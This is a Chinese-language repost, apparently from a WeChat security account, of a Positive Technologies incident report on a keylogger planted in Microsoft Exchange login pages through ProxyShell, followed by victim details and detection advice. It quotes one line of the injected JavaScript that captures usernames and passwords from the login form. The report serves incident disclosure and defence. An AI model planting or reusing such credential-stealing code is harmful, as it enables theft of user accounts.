在响应事件时,Positive Technologies Expert Security Center (PT ESC) 的事件响应团队发现我们一位客户的 Microsoft Exchange Server 主页中嵌入了一个未知的键盘记录器。该键盘记录器将帐户凭据收集到可通过互联网的特殊路径访问的文件中。该团队确定了 30 多名受害者,其中大多数与各个国家的政府机构有关。根据我们的数据,第一次入侵发生在 2021 年。如果没有其他数据,我们无法将这些攻击归咎于特定团体;然而,大多数受害者位于非洲和中东。
攻击场景
为了注入窃取程序,黑客利用了已知的 Microsoft Exchange Server 漏洞 ProxyShell。接下来,他们将键盘记录器代码添加到服务器主页。
这是黑客嵌入在 Microsoft Exchange Server 主页中的代码,具体来说是嵌入在clkLgn()函数中的代码:
var ObjectData = "ObjectType=" + escape(curTime + "t" + gbid("username").value + "t" + gbid("password").value) + "&uin=" + Math.random().toString(16).substring(2);
它在主页上的表现如下:
图 1. 受感染的 Microsoft Exchange 服务器主页代码
此外,在logon.aspx文件中,黑客添加了一个代码,用于处理窃取者的工作结果并将帐户凭据重定向到可从互联网访问的文件。
图 2. 受感染的 logon.aspx 文件的代码
通过图 2 所示的代码执行,攻击者获得了以下用户凭证的访问权限:
图 3. 被盗凭证
受害者
我们已确定有 30 多名受害者,主要是来自不同国家的政府机构。受害者名单还包括银行、IT 公司和教育机构。受这些攻击影响的国家包括俄罗斯、阿联酋、科威特、阿曼、尼日尔、尼日利亚、埃塞俄比亚、毛里求斯、约旦和黎巴嫩。所有受害者都已收到违规通知。
建议
您可以通过在 Microsoft Exchange 服务器主页上搜索窃取程序代码来检查是否存在潜在的入侵(见图 1)。如果您的服务器已被入侵,请识别被窃取的帐户数据并删除黑客存储这些数据的文件。您可以在 logon.aspx 文件中找到此文件的路径(见图 2)。确保您使用的是最新版本的 Microsoft Exchange Server,或者安装待更新。
原文始发于微信公众号(Ots安全):Positive Technologies 检测到一系列通过 Microsoft Exchange Server 发起的攻击
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论